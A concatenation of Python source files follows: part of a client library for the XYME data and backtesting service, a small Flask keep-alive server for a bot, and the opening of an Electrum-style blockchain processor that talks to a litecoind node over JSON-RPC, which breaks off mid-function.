res = cast(BacktestResponse, self._client._request_json(
METHOD_LONGPOST, "/summary", {
"job": self._job_id,
"ticker": ticker,
"predictionFeature": prediction_feature,
"strategy": strategy,
"baseStrategy": base_strategy,
"priceSourceId": price_source,
}, capture_err=False))
output = res.get("output", [])
stdout = StdoutWrapper({
"lines": output if output is not None else [],
"messages": {},
"exceptions": [],
})
if res.get("errMessage", None):
raise ValueError(res["errMessage"], stdout)
return res.get("pyfolio", None), stdout
def get_columns(self, ticker: Optional[str]) -> List[str]:
res = cast(JobColumnsResponse, self._client._request_json(
METHOD_POST, "/job_columns", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=True))
return res["columns"]
def get_data(
self, ticker: Optional[str], columns: List[str]) -> pd.DataFrame:
resp = self._client._request_bytes(
METHOD_POST, "/job_data", {
"job": self._job_id,
"ticker": ticker,
"columns": columns,
"format": "csv",
})
return pd.read_csv(resp)
def force_flush(self) -> None:
res = cast(ForceFlushResponse, self._client._request_json(
METHOD_PUT, "/force_flush", {
"job": self._job_id,
}, capture_err=False))
if not res["success"]:
raise AccessDenied(f"cannot access job {self._job_id}")
self.refresh()
def create_backup(self) -> 'JobHandle':
res = cast(JobBackupResponse, self._client._request_json(
METHOD_LONGPOST, "/backup_job", {
"job": self._job_id,
}, capture_err=True))
return JobHandle(
client=self._client,
job_id=res["jobId"],
path=None,
name=None,
schema_obj=None,
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def __repr__(self) -> str:
name = ""
if self._name is not None:
name = f" ({self._name})"
return f"{type(self).__name__}: {self._job_id}{name}"
def __str__(self) -> str:
return repr(self)
# *** JobHandle ***
InspectValue = Union['InspectPath', bool, int, float, str, None]
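# A lazy, read-only mapping over a remote inspection tree: values are
# fetched on first access via the owning InspectHandle and cached locally;
# iteration only sees keys that are already known.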
class InspectPath(collections.abc.Mapping):
def __init__(
self,
clazz: str,
inspect: 'InspectHandle',
path: List[str],
summary: str):
self._clazz = clazz
self._inspect = inspect
self._path = path
self._cache: Dict[str, InspectValue] = {}
self._key_cache: Optional[Set[str]] = None
self._summary = summary
def refresh(self) -> None:
self._cache = {}
def get_clazz(self) -> str:
return self._clazz
def has_cached_value(self, key: str) -> bool:
return key in self._cache
def _set_cache(self, key: str, value: InspectValue) -> None:
self._cache[key] = value
def _set_key_cache(self, keys: Iterable[str]) -> None:
self._key_cache = set(keys)
def __getitem__(self, key: str) -> InspectValue:
# pylint: disable=unsupported-membership-test
if self._key_cache is not None and key not in self._key_cache:
raise KeyError(key)
if not self.has_cached_value(key):
self._cache[key] = self._inspect.get_value_for_path(
self._path + [key])
return self._cache[key]
def _ensure_key_cache(self) -> None:
if self._key_cache is not None:
return
self._key_cache = set()
def __iter__(self) -> Iterator[str]:
self._ensure_key_cache()
assert self._key_cache is not None
return iter(self._key_cache)
def __len__(self) -> int:
self._ensure_key_cache()
assert self._key_cache is not None
return len(self._key_cache)
def __repr__(self) -> str:
res = f"{self._clazz}: {{"
first = True
for key in self:
if first:
first = False
else:
res += ", "
res += repr(key)
res += ": "
if self.has_cached_value(key):
res += repr(self[key])
else:
res += "..."
return f"{res}}}"
def __str__(self) -> str:
return f"{self._clazz}: {self._summary}"
# *** InspectPath ***
class InspectHandle(InspectPath):
def __init__(
self,
client: XYMELegacyClient,
job: JobHandle,
ticker: Optional[str]) -> None:
super().__init__("uninitialized", self, [], "uninitialized")
self._client = client
self._job_id = job._job_id
self._ticker = ticker
init = self._query([])
if init is not None:
self._clazz = init["clazz"]
self._summary = init["extra"]
values = init["value"]
if isinstance(values, list):
self._set_key_cache((name for (name, _) in values))
def _query(self, path: List[str]) -> Optional[InspectItem]:
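# Build a nested query dict mirroring the path, e.g. ["a", "b"] becomes
# {"state": {"a": {"b": {}}}}.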
query: InspectQuery = {"state": {}}
assert query is not None
subq = query["state"]
for seg in path:
assert subq is not None
subq[seg] = {}
subq = subq[seg]
res = cast(InspectResponse, self._client._request_json(
METHOD_LONGPOST, "/inspect", {
"job": self._job_id,
"query": query,
"ticker": self._ticker,
}, capture_err=False))
return res["inspect"]
def get_value_for_path(self, path: List[str]) -> InspectValue:
res: InspectValue = self
do_query = False
for seg in path:
if not isinstance(res, InspectPath):
raise TypeError(f"cannot query {seg} on {res}")
if res.has_cached_value(seg):
res = res[seg]
continue
do_query = True
break
def maybe_set_cache(
key: str,
ipath: InspectPath,
obj: InspectItem) -> Optional[InspectPath]:
has_value = False
res = None
if obj["leaf"]:
if obj["clazz"] == "None":
val: InspectValue = None
elif obj["clazz"] == "bool":
val = bool(obj["value"])
elif obj["clazz"] == "int":
if obj["value"] is None:
raise TypeError(f"did not expect None: {obj}")
if isinstance(obj["value"], list):
raise TypeError(f"did not expect list: {obj}")
val = int(obj["value"])
elif obj["clazz"] == "float":
if obj["value"] is None:
raise TypeError(f"did not expect None: {obj}")
if isinstance(obj["value"], list):
raise TypeError(f"did not expect list: {obj}")
val = float(obj["value"])
elif obj["clazz"] == "str":
val = str(obj["value"])
else:
if isinstance(obj["value"], list):
raise TypeError(f"did not expect list: {obj}")
val = obj["value"]
has_value = True
elif not obj["collapsed"]:
res = InspectPath(
obj["clazz"], self, list(upto), obj["extra"])
val = res
values = obj["value"]
if not isinstance(values, list):
raise TypeError(f"expected list got: {values}")
keys = []
for (name, cur) in values:
keys.append(name)
maybe_set_cache(name, val, cur)
val._set_key_cache(keys)
has_value = True
if has_value:
ipath._set_cache(key, val)
return res
if do_query:
obj = self._query(path)
res = self
upto = []
for seg in path:
upto.append(seg)
if obj is None:
raise KeyError(seg)
if obj["leaf"]:
raise ValueError(f"early leaf node at {seg}")
next_obj: Optional[InspectItem] = None
values = obj["value"]
if not isinstance(values, list):
raise TypeError(f"expected list got: {values}")
for (name, value) in values:
if name == seg:
next_obj = value
break
if next_obj is None:
raise KeyError(seg)
obj = next_obj
if not isinstance(res, InspectPath):
raise TypeError(f"cannot query {seg} on {res}")
if res.has_cached_value(seg):
res = res[seg]
else:
ipath = maybe_set_cache(seg, res, obj)
assert ipath is not None
res = ipath
return res
# *** InspectHandle ***
class SourceHandle:
def __init__(
self,
client: XYMELegacyClient,
source_id: str,
source_type: Optional[str],
infer_type: bool = False,
name: Optional[str] = None,
immutable: Optional[bool] = None,
help_message: Optional[str] = None):
if not source_id:
raise ValueError("source id is not set!")
if not infer_type and (
not source_type or source_type not in ALL_SOURCE_TYPES):
raise ValueError(f"invalid source type: {source_type}")
self._client = client
self._source_id = source_id
self._source_type = source_type
self._name = name
self._immutable = immutable
self._help = help_message
self._schema_obj: Optional[Dict[str, Any]] = None
self._dirty: Optional[bool] = None
def refresh(self) -> None:
self._schema_obj = None
self._dirty = None
self._immutable = None
self._name = None
self._help = None
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _fetch_info(self) -> None:
res = cast(SourceSchemaResponse, self._client._request_json(
METHOD_GET, "/source_schema", {
"sourceId": self._source_id,
}, capture_err=True))
self._schema_obj = res["sourceSchema"]
info = res["sourceInfo"]
self._dirty = info["dirty"]
self._immutable = info["immutable"]
self._name = info["sourceName"]
self._source_type = info["sourceType"]
def _ensure_multi_source(self) -> None:
if not self.is_multi_source():
raise ValueError("can only add source to multi source")
def _ensure_csv_source(self) -> None:
if not self.is_csv_source():
raise ValueError("can only set input for csv source")
def get_schema(self) -> Dict[str, Any]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
return copy.deepcopy(self._schema_obj)
def set_schema(self, schema: Dict[str, Any]) -> None:
res = cast(SchemaResponse, self._client._request_json(
METHOD_PUT, "/source_schema", {
"sourceId": self._source_id,
"schema": json.dumps(schema),
}, capture_err=True))
schema_obj = json.loads(res["schema"])
self._schema_obj = schema_obj
# NOTE: we can infer information about
# the source by being able to change it
self._name = schema_obj.get("name", self._source_id)
self._source_type = schema_obj.get("type")
self._help = schema_obj.get("help", "")
self._dirty = True
self._immutable = False
def get_name(self) -> str:
self._maybe_refresh()
if self._name is None:
self._fetch_info()
assert self._name is not None
return self._name
def get_help_message(self) -> str:
self._maybe_refresh()
if self._help is None:
self._fetch_info()
assert self._help is not None
return self._help
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
@contextlib.contextmanager
def update_schema(self) -> Iterator[Dict[str, Any]]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
yield self._schema_obj
self.set_schema(self._schema_obj)
def is_dirty(self) -> bool:
self._maybe_refresh()
if self._dirty is None:
self._fetch_info()
assert self._dirty is not None
return self._dirty
def is_immutable(self) -> bool:
self._maybe_refresh()
if self._immutable is None:
self._fetch_info()
assert self._immutable is not None
return self._immutable
def get_source_id(self) -> str:
return self._source_id
def get_source_type(self) -> str:
# NOTE: we don't refresh source type frequently
if self._source_type is None:
self._fetch_info()
assert self._source_type is not None
return self._source_type
def is_multi_source(self) -> bool:
return self.get_source_type() == SOURCE_TYPE_MULTI
def is_csv_source(self) -> bool:
return self.get_source_type() == SOURCE_TYPE_CSV
def set_immutable(self, is_immutable: bool) -> 'SourceHandle':
res = self._client.set_immutable_raw(self, None, None, is_immutable)
return res["new_source"]
def flip_immutable(self) -> 'SourceHandle':
res = self._client.set_immutable_raw(self, None, None, None)
return res["new_source"]
def add_new_source(self,
source_type: str,
name: Optional[str] = None) -> 'SourceHandle':
self._ensure_multi_source()
res = self._client._raw_create_source(
source_type, name, None, self, None)
self.refresh()
return res["source"]
def add_new_source_file(
self,
filename: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> 'SourceHandle':
with self.bulk_operation():
source = self.add_new_source(
SOURCE_TYPE_CSV, os.path.basename(filename))
source.set_input_file(
filename, ticker_column, date_column, progress_bar)
return source
def add_new_source_df(
self,
df: pd.DataFrame,
name: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> 'SourceHandle':
with self.bulk_operation():
source = self.add_new_source(SOURCE_TYPE_CSV, name)
source.set_input_df(
df, name, ticker_column, date_column, progress_bar)
return source
def add_source(self, source: 'SourceHandle') -> None:
with self.bulk_operation():
self._ensure_multi_source()
with self.update_schema() as schema_obj:
if "config" not in schema_obj:
schema_obj["config"] = {}
config = schema_obj["config"]
if "sources" not in config:
config["sources"] = []
config["sources"].append(source.get_source_id())
def set_input(
self,
input_obj: 'InputHandle',
ticker_column: Optional[str],
date_column: Optional[str]) -> None:
with self.bulk_operation():
self._ensure_csv_source()
with self.update_schema() as schema_obj:
with input_obj.bulk_operation():
if "config" not in schema_obj:
schema_obj["config"] = {}
config = schema_obj["config"]
ext = input_obj.get_extension()
if ext is None:
ext = "csv" # should be correct in 99% of the cases
config["filename"] = f"{input_obj.get_input_id()}.{ext}"
if ticker_column is not None:
config["ticker"] = ticker_column
if date_column is not None:
config["date"] = date_column
def set_input_file(
self,
filename: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
with self.bulk_operation():
self._ensure_csv_source()
input_obj = self._client.input_from_file(filename, progress_bar)
self.set_input(input_obj, ticker_column, date_column)
def set_input_df(
self,
df: pd.DataFrame,
name: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
with self.bulk_operation():
self._ensure_csv_source()
input_obj = self._client.input_from_df(df, name, progress_bar)
self.set_input(input_obj, ticker_column, date_column)
def get_sources(self) -> Iterable['SourceHandle']:
with self.bulk_operation():
self._ensure_multi_source()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
sources = self._schema_obj.get("config", {}).get("sources", [])
for source_id in sources:
yield SourceHandle(
self._client, source_id, None, infer_type=True)
def get_input(self) -> Optional['InputHandle']:
with self.bulk_operation():
self._ensure_csv_source()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
fname = self._schema_obj.get("config", {}).get("filename", None)
if fname is None:
return None
dot = fname.find(".")
input_id = fname[:dot] if dot >= 0 else fname
return InputHandle(self._client, input_id)
def __repr__(self) -> str:
name = ""
if self._name is not None:
name = f" ({self._name})"
return f"{type(self).__name__}: {self._source_id}{name}"
def __str__(self) -> str:
return repr(self)
# *** SourceHandle ***
class InputHandle:
def __init__(
self,
client: XYMELegacyClient,
input_id: str,
name: Optional[str] = None,
path: Optional[str] = None,
ext: Optional[str] = None,
size: Optional[int] = None,
progress: Optional[str] = None) -> None:
if not input_id:
raise ValueError("input id is not set!")
self._client = client
self._input_id = input_id
self._name = name
self._ext = ext
self._size = size
self._path = path
self._progress = progress
self._last_byte_offset: Optional[int] = None
def refresh(self) -> None:
self._name = None
self._path = None
self._ext = None
self._progress = None
self._last_byte_offset = None
self._size = None
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _fetch_info(self) -> None:
res = cast(InputDetailsResponse, self._client._request_json(
METHOD_GET, "/input_details", {
"inputId": self._input_id,
}, capture_err=False))
self._input_id = res["inputId"]
self._name = res["name"]
self._path = res["path"]
self._ext = res["extension"]
self._last_byte_offset = res["lastByteOffset"]
self._size = res["size"]
self._progress = res["progress"]
if self._progress is None:
self._progress = "unknown"
def get_input_id(self) -> str:
return self._input_id
def get_name(self) -> Optional[str]:
self._maybe_refresh()
if self._name is None:
self._fetch_info()
return self._name
def get_path(self) -> str:
self._maybe_refresh()
if self._path is None:
self._fetch_info()
assert self._path is not None
return self._path
def get_extension(self) -> Optional[str]:
self._maybe_refresh()
if self._ext is None:
self._fetch_info()
return self._ext
def get_last_byte_offset(self) -> Optional[int]:
self._maybe_refresh()
if self._last_byte_offset is None:
self._fetch_info()
return self._last_byte_offset
def get_size(self) -> Optional[int]:
self._maybe_refresh()
if self._size is None:
self._fetch_info()
return self._size
def get_progress(self) -> str:
self._maybe_refresh()
if self._progress is None:
self._fetch_info()
assert self._progress is not None
return self._progress
def is_complete(self) -> bool:
return self.get_progress() == UPLOAD_DONE
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def upload_partial(self, chunk_content: IO[bytes]) -> bool:
if self._last_byte_offset is None or self._name is None:
self._fetch_info()
if self._last_byte_offset is None:
self._last_byte_offset = 0
if self._name is None:
self._name = "unnamed file"
res = cast(UploadResponse, self._client._request_json(
METHOD_FILE, "/upload", {
"inputId": self._input_id,
"chunkByteOffset": self._last_byte_offset,
"type": "input",
"name": self._name,
}, capture_err=True, files={
"file": chunk_content,
}))
self._input_id = res["inputId"]
self._name = res["name"]
self._path = res["path"]
self._ext = res["extension"]
self._last_byte_offset = res["lastByteOffset"]
self._size = res["size"]
self._progress = res["progress"]
return res["exists"]
def upload_full(
self,
file_content: IO[bytes],
file_name: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout) -> int:
if file_name is not None:
self._name = file_name
total_size: Optional[int] = None
if progress_bar is not None:
if hasattr(file_content, "seek"):
init_pos = file_content.seek(0, io.SEEK_CUR)
total_size = file_content.seek(0, io.SEEK_END) - init_pos
file_content.seek(init_pos, io.SEEK_SET)
end = ":"
else:
end = "."
if file_name is None:
msg = f"Uploading unnamed file{end}\n"
else:
msg = f"Uploading file {file_name}{end}\n"
progress_bar.write(msg)
print_progress = get_progress_bar(out=progress_bar)
cur_size = 0
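# Upload the content in chunks of get_file_upload_chunk_size() bytes;
# upload_partial returning True (the server reports the input as already
# existing) ends the loop early.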
while True:
if total_size is not None:
print_progress(cur_size / total_size, False)
buff = file_content.read(get_file_upload_chunk_size())
if not buff:
break
cur_size += len(buff)
if self.upload_partial(BytesIO(buff)):
break
if total_size is not None:
print_progress(cur_size / total_size, True)
return cur_size
def __repr__(self) -> str:
name = ""
if self._name is not None:
name = f" ({self._name})"
return f"{type(self).__name__}: {self._input_id}{name}"
def __str__(self) -> str:
return repr(self)
# *** InputHandle ***
def create_legacy_client(
url: str,
user: Optional[str] = None,
password: Optional[str] = None,
token: Optional[str] = None) -> XYMELegacyClient:
return XYMELegacyClient(url, user, password, token)
@contextlib.contextmanager
def create_legacy_session(
url: str,
user: Optional[str] = None,
password: Optional[str] = None,
token: Optional[str] = None) -> Iterator[XYMELegacyClient]:
client = None
try:
client = XYMELegacyClient(url, user, password, token)
yield client
finally:
if client is not None:
client.logout()
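# A minimal usage sketch (assumptions, not part of this module: the URL,
# credentials, and "my_job_id" are placeholders for a reachable XYME
# server and an existing job):
#
#     with create_legacy_session(
#             "https://xyme.example.com",
#             user="alice",
#             password="secret") as client:
#         job = client.get_job("my_job_id")
#         print(job.get_status(fast_return=False))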
|
keep_alive.py
|
#------------------------------------------------------------------------#
#---------------------- TO keep the bot running ------------------------#
#------------------------------------------------------------------------#
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return"Hello, I am alive!"
def main():
return "Your Bot Is Ready"
def run():
app.run(host="0.0.0.0", port=8000)
def keep_alive():
server = Thread(target=run)
server.start()
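# Typical usage (a sketch; the bot object and its token come from the
# calling script and are assumptions here):
#
#     keep_alive()     # serve "/" on port 8000 in a background thread
#     bot.run(TOKEN)   # then start the long-running bot client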
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, Hash, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0, 0, 0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.bitcoind_url = 'http://%s:%s@%s:%s/' % (
config.get('bitcoind', 'bitcoind_user'),
config.get('bitcoind', 'bitcoind_password'),
config.get('bitcoind', 'bitcoind_host'),
config.get('bitcoind', 'bitcoind_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("litecoind is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
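# Editor's note on the update above: alpha = (1 + 0.01*n)/(n + 1) equals 1 for the first
# sample (n = 0) and tends to 0.01 as n grows (e.g. n = 99 gives alpha = 1.99/100 ~ 0.02),
# so seconds_per_block converges to an exponential moving average with roughly a 1% weight
# per new block.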
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 300000)\
or self.storage.height >= 1000000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.bitcoind_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_bitcoind(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def bitcoind(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach litecoind...")
self.wait_on_bitcoind()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("litecoind still warming up...")
self.wait_on_bitcoind()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
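# Illustrative example (editor's sketch): given a hypothetical getblock result such as
#   {'height': 123456, 'version': 2, 'previousblockhash': '00...ab', 'merkleroot': '4a...9f',
#    'time': 1400000000, 'bits': '1b0404cb', 'nonce': 222}
# block2header() returns
#   {'block_height': 123456, 'version': 2, 'prev_block_hash': '00...ab', 'merkle_root': '4a...9f',
#    'timestamp': 1400000000, 'bits': 0x1b0404cb, 'nonce': 222}
# i.e. the field names are remapped and 'bits' is parsed from a hex string into an int.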
def get_header(self, height):
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
return rev_hex(Hash(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80)
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
self.headers_data = self.headers_data[:-40]
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
# store them on disk; store the current chunk in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.bitcoind('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
v = 0
with self.mempool_lock:
for txid, delta in self.mempool_hist.get(addr, ()):
v += delta
return v
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
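# Editor's note, a worked example of the branch construction above: for a block with four
# transactions [A, B, C, D] and tx_hash == B, the first pass pairs (A, B) and (C, D); A is
# appended to s as B's sibling and the target becomes Hash(A+B). The second pass pairs
# (Hash(A+B), Hash(C+D)); Hash(C+D) is appended and the target becomes the merkle root.
# The client can then rebuild the root from B, s == [A, Hash(C+D)] and pos == 1.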
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.bitcoind_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
# see if we can get it from the cache; if not, add the request to the queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
